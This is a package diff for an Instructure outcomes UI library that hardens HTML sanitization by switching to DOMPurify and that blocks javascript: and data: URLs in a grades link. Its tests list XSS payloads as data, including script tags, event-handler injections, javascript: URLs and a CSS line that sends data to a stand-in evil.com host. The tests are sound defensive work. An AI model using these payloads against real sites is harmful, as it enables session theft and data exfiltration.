@instructure/outcomes-ui 4.1.4 → 4.1.5

package/lib/translated/ja/lib/__tests__/sanitize.test.js

@@ -2,17 +2,139 @@
 
 var _globals = require("@jest/globals");
 var _sanitize = require("../sanitize.js");
-(0, _globals.describe)('sanitizeForHtml', function () {
-  (0, _globals.it)('cleans invalid tags', function () {
-    var invalid = '<monkey>tag isn\'t closed';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(invalid)).toContain('</monkey>');
+(0, _globals.describe)('sanitizeHtml', function () {
+  (0, _globals.describe)('equation images (Canvas-specific)', function () {
+    (0, _globals.it)('rewrites /equation_images src to absolute canvas URL', function () {
+      var equationImage = 'Some text with an <img src="/equation_images/image" />';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('canvas.instructure.com/equation_images/image');
+    });
+    (0, _globals.it)('adds vertical-align style to equation images', function () {
+      var equationImage = '<img src="/equation_images/abc" />';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('vertical-align: middle');
+    });
+    (0, _globals.it)('leaves non-equation image src untouched', function () {
+      var otherImage = '<img src="/another_image">';
+      var out = (0, _sanitize.sanitizeHtml)(otherImage);
+      (0, _globals.expect)(out).toContain('src="/another_image"');
+      (0, _globals.expect)(out).not.toContain('canvas.instructure.com');
+    });
   });
-  (0, _globals.it)('replaces equation images', function () {
-    var equationImage = 'Some text with an <img src="/equation_images/image" />';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('canvas.instructure.com/equation_images/image');
+  (0, _globals.describe)('null / empty input handling', function () {
+    (0, _globals.it)('returns empty string for null', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(null)).toBe('');
+    });
+    (0, _globals.it)('returns empty string for undefined', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(void 0)).toBe('');
+    });
+    (0, _globals.it)('returns empty string for empty string', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)('')).toBe('');
+    });
   });
-  (0, _globals.it)('leaves other images alone', function () {
-    var otherImage = 'Some text with <img src="/another_image" />';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(otherImage)).toBe(otherImage);
+  (0, _globals.describe)('XSS - script execution vectors', function () {
+    (0, _globals.it)('strips <script> tags', function () {
+      var xss = 'Hello<script>alert(1)</script>World';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toContain('<script');
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips inline event handlers (onerror)', function () {
+      var xss = '<img src="x" onerror="alert(1)">';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onerror/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips inline event handlers (onclick)', function () {
+      var xss = '<a href="#" onclick="alert(1)">click</a>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onclick/i);
+    });
+    (0, _globals.it)('strips inline event handlers (onload on svg)', function () {
+      var xss = '<svg onload="alert(1)"></svg>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onload/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips javascript: URLs in href', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<a href="javascript:alert(1)">x</a>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/javascript:/i);
+    });
+    (0, _globals.it)('strips javascript: URLs in img src', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<img src="javascript:alert(1)">';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/javascript:/i);
+    });
+    (0, _globals.it)('strips data: URLs that contain HTML/JS in iframe src', function () {
+      var xss = '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips <object> tags', function () {
+      var xss = '<object data="evil.swf"></object>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<object');
+    });
+    (0, _globals.it)('strips <embed> tags', function () {
+      var xss = '<embed src="evil.swf">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<embed');
+    });
+    (0, _globals.it)('strips <form> tags (CSRF / phishing surface)', function () {
+      var xss = '<form action="https://evil.com"><input name=x></form>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<form');
+    });
+    (0, _globals.it)('strips style tags (CSS-based exfil / clickjacking)', function () {
+      var xss = '<style>body{background:url(//evil.com/?c=)}</style>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<style');
+    });
+    (0, _globals.it)('strips <meta http-equiv refresh> redirects', function () {
+      var xss = '<meta http-equiv="refresh" content="0;url=https://evil.com">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<meta');
+    });
+    (0, _globals.it)('strips <base> tag (can rewrite all relative URLs)', function () {
+      var xss = '<base href="https://evil.com/">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<base');
+    });
+    (0, _globals.it)('strips encoded onerror payloads', function () {
+      var xss = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onerror/i);
+    });
+    (0, _globals.it)('strips mixed-case obfuscated script tags', function () {
+      var xss = '<ScRiPt>alert(1)</sCrIpT>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/<script/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+  });
+  (0, _globals.describe)('benign HTML (should be preserved)', function () {
+    (0, _globals.it)('preserves basic formatting tags', function () {
+      var html = '<p>Hello <strong>world</strong> <em>!</em></p>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toBe(html);
+    });
+    (0, _globals.it)('preserves links with safe http(s) hrefs', function () {
+      var html = '<a href="https://example.com">link</a>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toContain('href="https://example.com"');
+    });
+    (0, _globals.it)('preserves lists', function () {
+      var html = '<ul><li>a</li><li>b</li></ul>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toBe(html);
+    });
+    (0, _globals.it)('preserves Canvas RCE iframes (Studio / media embeds)', function () {
+      var html = '<iframe src="https://canvas.instructure.com/media_objects_iframe/123" ' + 'allowfullscreen="" allow="fullscreen" frameborder="0" ' + 'data-media-id="123" data-media-type="video"></iframe>';
+      var out = (0, _sanitize.sanitizeHtml)(html);
+      (0, _globals.expect)(out).toContain('<iframe');
+      (0, _globals.expect)(out).toContain('data-media-id="123"');
+      (0, _globals.expect)(out).toContain('data-media-type="video"');
+      (0, _globals.expect)(out).toContain('allowfullscreen');
+    });
+  });
+  (0, _globals.describe)('link hardening', function () {
+    (0, _globals.it)('adds rel="noopener noreferrer" to target=_blank links', function () {
+      var html = '<a href="https://example.com" target="_blank">x</a>';
+      var out = (0, _sanitize.sanitizeHtml)(html);
+      (0, _globals.expect)(out).toMatch(/rel=["'][^"']*noopener[^"']*["']/);
+      (0, _globals.expect)(out).toMatch(/rel=["'][^"']*noreferrer[^"']*["']/);
+    });
   });
 });

package/lib/translated/ja/lib/sanitize.js

@@ -5,32 +5,28 @@ Object.defineProperty(exports, "__esModule", {
   value: true
 });
 exports.sanitizeHtml = sanitizeHtml;
-var _objectSpread2 = _interopRequireDefault(require("@babel/runtime/helpers/objectSpread2"));
-var _sanitizeHtml = _interopRequireDefault(require("sanitize-html"));
-function transformEquationImage(tagName, attribs) {
-  return {
-    tagName: tagName,
-    attribs: (0, _objectSpread2.default)((0, _objectSpread2.default)({}, attribs), {}, {
-      src: "https://canvas.instructure.com".concat(attribs.src),
-      style: 'vertical-align: middle'
-    })
-  };
-}
-function transformImage(tagName, attribs) {
-  if (attribs.src != null && attribs.src.indexOf('/equation_images') === 0) {
-    return transformEquationImage(tagName, attribs);
+var _dompurify = _interopRequireDefault(require("dompurify"));
+var CONFIG = {
+  ADD_TAGS: ['iframe'],
+  ADD_ATTR: ['allowfullscreen', 'allow', 'frameborder', 'sandbox', 'target', 'data-media-id', 'data-media-type'],
+  FORBID_TAGS: ['form', 'input', 'button', 'textarea', 'select', 'option']
+};
+
+// Rewrite Canvas equation-image relative URLs to absolute,
+// preserving the previous behavior of this module.
+_dompurify.default.addHook('afterSanitizeAttributes', function (node) {
+  if (node.tagName === 'IMG') {
+    var src = node.getAttribute('src') || '';
+    if (src.indexOf('/equation_images') === 0) {
+      node.setAttribute('src', "https://canvas.instructure.com".concat(src));
+      node.setAttribute('style', 'vertical-align: middle');
+    }
+  }
+  // Harden links opened in a new tab against tab-nabbing.
+  if (node.tagName === 'A' && node.getAttribute('target') === '_blank') {
+    node.setAttribute('rel', 'noopener noreferrer');
   }
-  return {
-    tagName: tagName,
-    attribs: attribs
-  };
-}
+});
 function sanitizeHtml(html) {
-  return (0, _sanitizeHtml.default)(html, {
-    allowedTags: false,
-    allowedAttributes: false,
-    transformTags: {
-      img: transformImage
-    }
-  });
+  return _dompurify.default.sanitize(html == null ? '' : html, CONFIG);
 }

package/lib/translated/mi/components/Gradebook/popovers/StudentPopover/__tests__/index.test.js

@@ -257,80 +257,156 @@ describe('StudentPopover', function () {
       }, _callee0);
     })));
   });
-  describe('Loading State', function () {
-    it('shows a spinner when isLoading is true', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee1() {
-      var _t6;
+  describe('Security', function () {
+    it('does not render the mastery report link for a javascript: URI', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee1() {
       return (0, _regenerator2.default)().w(function (_context1) {
         while (1) switch (_context1.n) {
           case 0:
             renderComponent({
-              isLoading: true
+              studentGradesUrl: 'javascript:alert(document.cookie)'
             });
             _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
-            _t6 = expect;
             _context1.n = 1;
-            return _react2.screen.findByTitle('Loading user details');
+            return _react2.screen.findByText('Message');
           case 1:
-            _t6(_context1.v).toBeInTheDocument();
+            expect(_react2.screen.queryByText('View Mastery Report')).not.toBeInTheDocument();
           case 2:
             return _context1.a(2);
         }
       }, _callee1);
     })));
-    it('does not show student details when isLoading is true', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee10() {
+    it('does not render the mastery report link for a data: URI', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee10() {
       return (0, _regenerator2.default)().w(function (_context10) {
         while (1) switch (_context10.n) {
           case 0:
             renderComponent({
-              isLoading: true
+              studentGradesUrl: 'data:text/html,<script>alert(1)</script>'
             });
             _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
             _context10.n = 1;
-            return _react2.screen.findByTitle('Loading user details');
+            return _react2.screen.findByText('Message');
           case 1:
-            expect(_react2.screen.queryByTestId('lmgb-student-popover-avatar')).not.toBeInTheDocument();
+            expect(_react2.screen.queryByText('View Mastery Report')).not.toBeInTheDocument();
           case 2:
             return _context10.a(2);
         }
       }, _callee10);
     })));
-  });
-  describe('Error State', function () {
-    it('shows an error message when error prop is provided', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee11() {
-      var _t7;
+    it('renders the mastery report link for a safe https URL', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee11() {
+      var safeUrl, masteryLink;
       return (0, _regenerator2.default)().w(function (_context11) {
         while (1) switch (_context11.n) {
           case 0:
+            safeUrl = 'https://canvas.instructure.com/courses/123/grades/1';
             renderComponent({
-              error: 'Failed to load student details'
+              studentGradesUrl: safeUrl
             });
             _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
-            _t7 = expect;
             _context11.n = 1;
-            return _react2.screen.findByText('Failed to load student details');
+            return _react2.screen.findByText('View Mastery Report');
           case 1:
-            _t7(_context11.v).toBeInTheDocument();
+            masteryLink = _context11.v;
+            expect(masteryLink.closest('a')).toHaveAttribute('href', safeUrl);
           case 2:
             return _context11.a(2);
         }
       }, _callee11);
     })));
-    it('does not show student details when error is present', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee12() {
+    it('renders the mastery report link for a safe http URL', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee12() {
+      var safeUrl, masteryLink;
       return (0, _regenerator2.default)().w(function (_context12) {
         while (1) switch (_context12.n) {
           case 0:
+            safeUrl = 'http://canvas.instructure.com/courses/123/grades/1';
             renderComponent({
-              error: 'Something went wrong'
+              studentGradesUrl: safeUrl
             });
             _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
             _context12.n = 1;
-            return _react2.screen.findByText('Something went wrong');
+            return _react2.screen.findByText('View Mastery Report');
           case 1:
-            expect(_react2.screen.queryByTestId('lmgb-student-popover-avatar')).not.toBeInTheDocument();
+            masteryLink = _context12.v;
+            expect(masteryLink.closest('a')).toHaveAttribute('href', safeUrl);
           case 2:
             return _context12.a(2);
         }
       }, _callee12);
     })));
   });
+  describe('Loading State', function () {
+    it('shows a spinner when isLoading is true', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee13() {
+      var _t6;
+      return (0, _regenerator2.default)().w(function (_context13) {
+        while (1) switch (_context13.n) {
+          case 0:
+            renderComponent({
+              isLoading: true
+            });
+            _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
+            _t6 = expect;
+            _context13.n = 1;
+            return _react2.screen.findByTitle('Loading user details');
+          case 1:
+            _t6(_context13.v).toBeInTheDocument();
+          case 2:
+            return _context13.a(2);
+        }
+      }, _callee13);
+    })));
+    it('does not show student details when isLoading is true', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee14() {
+      return (0, _regenerator2.default)().w(function (_context14) {
+        while (1) switch (_context14.n) {
+          case 0:
+            renderComponent({
+              isLoading: true
+            });
+            _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
+            _context14.n = 1;
+            return _react2.screen.findByTitle('Loading user details');
+          case 1:
+            expect(_react2.screen.queryByTestId('lmgb-student-popover-avatar')).not.toBeInTheDocument();
+          case 2:
+            return _context14.a(2);
+        }
+      }, _callee14);
+    })));
+  });
+  describe('Error State', function () {
+    it('shows an error message when error prop is provided', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee15() {
+      var _t7;
+      return (0, _regenerator2.default)().w(function (_context15) {
+        while (1) switch (_context15.n) {
+          case 0:
+            renderComponent({
+              error: 'Failed to load student details'
+            });
+            _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
+            _t7 = expect;
+            _context15.n = 1;
+            return _react2.screen.findByText('Failed to load student details');
+          case 1:
+            _t7(_context15.v).toBeInTheDocument();
+          case 2:
+            return _context15.a(2);
+        }
+      }, _callee15);
+    })));
+    it('does not show student details when error is present', /*#__PURE__*/(0, _asyncToGenerator2.default)(/*#__PURE__*/(0, _regenerator2.default)().m(function _callee16() {
+      return (0, _regenerator2.default)().w(function (_context16) {
+        while (1) switch (_context16.n) {
+          case 0:
+            renderComponent({
+              error: 'Something went wrong'
+            });
+            _react2.fireEvent.click(_react2.screen.getByTestId('student-cell-link'));
+            _context16.n = 1;
+            return _react2.screen.findByText('Something went wrong');
+          case 1:
+            expect(_react2.screen.queryByTestId('lmgb-student-popover-avatar')).not.toBeInTheDocument();
+          case 2:
+            return _context16.a(2);
+        }
+      }, _callee16);
+    })));
+  });
 });

package/lib/translated/mi/components/Gradebook/popovers/StudentPopover/index.js

@@ -107,6 +107,9 @@ var MasteryScores = function MasteryScores(_ref2) {
     }, bucket.count)));
   }))));
 };
+var isSafeUrl = function isSafeUrl(url) {
+  return /^(https?:\/\/|\/)/i.test(url);
+};
 var Actions = function Actions(_ref3) {
   var studentGradesUrl = _ref3.studentGradesUrl;
   var _useState = (0, _react.useState)(false),
@@ -129,7 +132,7 @@ var Actions = function Actions(_ref3) {
     borderWidth: "none small none none",
     width: "0px",
     height: "1.4rem"
-  }), studentGradesUrl && /*#__PURE__*/_react.default.createElement(_uiFlex.Flex.Item, null, /*#__PURE__*/_react.default.createElement(_uiLink.Link, {
+  }), studentGradesUrl && isSafeUrl(studentGradesUrl) && /*#__PURE__*/_react.default.createElement(_uiFlex.Flex.Item, null, /*#__PURE__*/_react.default.createElement(_uiLink.Link, {
     href: studentGradesUrl,
     variant: "standalone"
   }, /*#__PURE__*/_react.default.createElement(_uiText.Text, {

package/lib/translated/mi/lib/__tests__/sanitize.test.js

@@ -2,17 +2,139 @@
 
 var _globals = require("@jest/globals");
 var _sanitize = require("../sanitize.js");
-(0, _globals.describe)('sanitizeForHtml', function () {
-  (0, _globals.it)('cleans invalid tags', function () {
-    var invalid = '<monkey>tag isn\'t closed';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(invalid)).toContain('</monkey>');
+(0, _globals.describe)('sanitizeHtml', function () {
+  (0, _globals.describe)('equation images (Canvas-specific)', function () {
+    (0, _globals.it)('rewrites /equation_images src to absolute canvas URL', function () {
+      var equationImage = 'Some text with an <img src="/equation_images/image" />';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('canvas.instructure.com/equation_images/image');
+    });
+    (0, _globals.it)('adds vertical-align style to equation images', function () {
+      var equationImage = '<img src="/equation_images/abc" />';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('vertical-align: middle');
+    });
+    (0, _globals.it)('leaves non-equation image src untouched', function () {
+      var otherImage = '<img src="/another_image">';
+      var out = (0, _sanitize.sanitizeHtml)(otherImage);
+      (0, _globals.expect)(out).toContain('src="/another_image"');
+      (0, _globals.expect)(out).not.toContain('canvas.instructure.com');
+    });
   });
-  (0, _globals.it)('replaces equation images', function () {
-    var equationImage = 'Some text with an <img src="/equation_images/image" />';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(equationImage)).toContain('canvas.instructure.com/equation_images/image');
+  (0, _globals.describe)('null / empty input handling', function () {
+    (0, _globals.it)('returns empty string for null', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(null)).toBe('');
+    });
+    (0, _globals.it)('returns empty string for undefined', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(void 0)).toBe('');
+    });
+    (0, _globals.it)('returns empty string for empty string', function () {
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)('')).toBe('');
+    });
   });
-  (0, _globals.it)('leaves other images alone', function () {
-    var otherImage = 'Some text with <img src="/another_image" />';
-    (0, _globals.expect)((0, _sanitize.sanitizeHtml)(otherImage)).toBe(otherImage);
+  (0, _globals.describe)('XSS - script execution vectors', function () {
+    (0, _globals.it)('strips <script> tags', function () {
+      var xss = 'Hello<script>alert(1)</script>World';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toContain('<script');
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips inline event handlers (onerror)', function () {
+      var xss = '<img src="x" onerror="alert(1)">';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onerror/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips inline event handlers (onclick)', function () {
+      var xss = '<a href="#" onclick="alert(1)">click</a>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onclick/i);
+    });
+    (0, _globals.it)('strips inline event handlers (onload on svg)', function () {
+      var xss = '<svg onload="alert(1)"></svg>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onload/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips javascript: URLs in href', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<a href="javascript:alert(1)">x</a>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/javascript:/i);
+    });
+    (0, _globals.it)('strips javascript: URLs in img src', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<img src="javascript:alert(1)">';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/javascript:/i);
+    });
+    (0, _globals.it)('strips data: URLs that contain HTML/JS in iframe src', function () {
+      var xss = '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+    (0, _globals.it)('strips <object> tags', function () {
+      var xss = '<object data="evil.swf"></object>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<object');
+    });
+    (0, _globals.it)('strips <embed> tags', function () {
+      var xss = '<embed src="evil.swf">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<embed');
+    });
+    (0, _globals.it)('strips <form> tags (CSRF / phishing surface)', function () {
+      var xss = '<form action="https://evil.com"><input name=x></form>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<form');
+    });
+    (0, _globals.it)('strips style tags (CSS-based exfil / clickjacking)', function () {
+      var xss = '<style>body{background:url(//evil.com/?c=)}</style>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<style');
+    });
+    (0, _globals.it)('strips <meta http-equiv refresh> redirects', function () {
+      var xss = '<meta http-equiv="refresh" content="0;url=https://evil.com">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<meta');
+    });
+    (0, _globals.it)('strips <base> tag (can rewrite all relative URLs)', function () {
+      var xss = '<base href="https://evil.com/">';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(xss)).not.toContain('<base');
+    });
+    (0, _globals.it)('strips encoded onerror payloads', function () {
+      var xss = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/onerror/i);
+    });
+    (0, _globals.it)('strips mixed-case obfuscated script tags', function () {
+      var xss = '<ScRiPt>alert(1)</sCrIpT>';
+      var out = (0, _sanitize.sanitizeHtml)(xss);
+      (0, _globals.expect)(out).not.toMatch(/<script/i);
+      (0, _globals.expect)(out).not.toContain('alert(1)');
+    });
+  });
+  (0, _globals.describe)('benign HTML (should be preserved)', function () {
+    (0, _globals.it)('preserves basic formatting tags', function () {
+      var html = '<p>Hello <strong>world</strong> <em>!</em></p>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toBe(html);
+    });
+    (0, _globals.it)('preserves links with safe http(s) hrefs', function () {
+      var html = '<a href="https://example.com">link</a>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toContain('href="https://example.com"');
+    });
+    (0, _globals.it)('preserves lists', function () {
+      var html = '<ul><li>a</li><li>b</li></ul>';
+      (0, _globals.expect)((0, _sanitize.sanitizeHtml)(html)).toBe(html);
+    });
+    (0, _globals.it)('preserves Canvas RCE iframes (Studio / media embeds)', function () {
+      var html = '<iframe src="https://canvas.instructure.com/media_objects_iframe/123" ' + 'allowfullscreen="" allow="fullscreen" frameborder="0" ' + 'data-media-id="123" data-media-type="video"></iframe>';
+      var out = (0, _sanitize.sanitizeHtml)(html);
+      (0, _globals.expect)(out).toContain('<iframe');
+      (0, _globals.expect)(out).toContain('data-media-id="123"');
+      (0, _globals.expect)(out).toContain('data-media-type="video"');
+      (0, _globals.expect)(out).toContain('allowfullscreen');
+    });
+  });
+  (0, _globals.describe)('link hardening', function () {
+    (0, _globals.it)('adds rel="noopener noreferrer" to target=_blank links', function () {
+      var html = '<a href="https://example.com" target="_blank">x</a>';
+      var out = (0, _sanitize.sanitizeHtml)(html);
+      (0, _globals.expect)(out).toMatch(/rel=["'][^"']*noopener[^"']*["']/);
+      (0, _globals.expect)(out).toMatch(/rel=["'][^"']*noreferrer[^"']*["']/);
+    });
   });
 });

package/lib/translated/mi/lib/sanitize.js

@@ -5,32 +5,28 @@ Object.defineProperty(exports, "__esModule", {
   value: true
 });
 exports.sanitizeHtml = sanitizeHtml;
-var _objectSpread2 = _interopRequireDefault(require("@babel/runtime/helpers/objectSpread2"));
-var _sanitizeHtml = _interopRequireDefault(require("sanitize-html"));
-function transformEquationImage(tagName, attribs) {
-  return {
-    tagName: tagName,
-    attribs: (0, _objectSpread2.default)((0, _objectSpread2.default)({}, attribs), {}, {
-      src: "https://canvas.instructure.com".concat(attribs.src),
-      style: 'vertical-align: middle'
-    })
-  };
-}
-function transformImage(tagName, attribs) {
-  if (attribs.src != null && attribs.src.indexOf('/equation_images') === 0) {
-    return transformEquationImage(tagName, attribs);
+var _dompurify = _interopRequireDefault(require("dompurify"));
+var CONFIG = {
+  ADD_TAGS: ['iframe'],
+  ADD_ATTR: ['allowfullscreen', 'allow', 'frameborder', 'sandbox', 'target', 'data-media-id', 'data-media-type'],
+  FORBID_TAGS: ['form', 'input', 'button', 'textarea', 'select', 'option']
+};
+
+// Rewrite Canvas equation-image relative URLs to absolute,
+// preserving the previous behavior of this module.
+_dompurify.default.addHook('afterSanitizeAttributes', function (node) {
+  if (node.tagName === 'IMG') {
+    var src = node.getAttribute('src') || '';
+    if (src.indexOf('/equation_images') === 0) {
+      node.setAttribute('src', "https://canvas.instructure.com".concat(src));
+      node.setAttribute('style', 'vertical-align: middle');
+    }
+  }
+  // Harden links opened in a new tab against tab-nabbing.
+  if (node.tagName === 'A' && node.getAttribute('target') === '_blank') {
+    node.setAttribute('rel', 'noopener noreferrer');
   }
-  return {
-    tagName: tagName,
-    attribs: attribs
-  };
-}
+});
 function sanitizeHtml(html) {
-  return (0, _sanitizeHtml.default)(html, {
-    allowedTags: false,
-    allowedAttributes: false,
-    transformTags: {
-      img: transformImage
-    }
-  });
+  return _dompurify.default.sanitize(html == null ? '' : html, CONFIG);
 }